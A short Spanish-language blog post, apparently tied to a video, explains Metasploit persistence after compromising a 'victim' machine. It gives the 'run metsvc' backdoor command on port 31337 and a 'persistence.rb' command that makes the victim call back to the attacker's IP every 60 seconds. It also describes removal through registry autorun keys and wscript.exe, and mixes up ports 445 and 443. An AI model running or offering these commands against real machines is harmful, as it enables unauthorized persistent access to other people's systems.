En anteriores
videos habĂamos ya adelantado un poco sobre metasploit, en este caso vamos a
hablar de dos scrips de esta herramienta el cual nos permite mantener nuestra conexiĂłn
con la victima luego de haberse reiniciado la máquina.
Con el comando
run metsvc vamos a dejar una puerta trasera
en la maquina victima el cual vamos a poder conectarnos configurando un handler
con el puerto 31337. Aunque esto solo nos va a permitir si la vĂctima no se
encuentra detrás de un firewall.
Aunque el otro método
a utilizar no necesitamos esa caracterĂstica de nuestra vĂctima. Tan solo con
el comando run persistence.rb –x –i 60 –p 445 –r (ip atacante) vamos a establecer
una conexión más segura.
Esto significa
que cada 60 segundos la máquina de la vĂctima se intentara conectar al puerto
443 en la dirección del atacante donde estará nuestro handler a la escucha.
Para eliminar la
persistencia en el caso de metsvc puedes desde una Shell de meterpreter con el
comando metsvc –r pero el servicio de persistence.rb no. Tendremos que eliminar
las claves de autorun del registro y matar el proceso wscript.exe.
Facebook:
SuscrĂbete al canal para
mas videos!!

0 Comentarios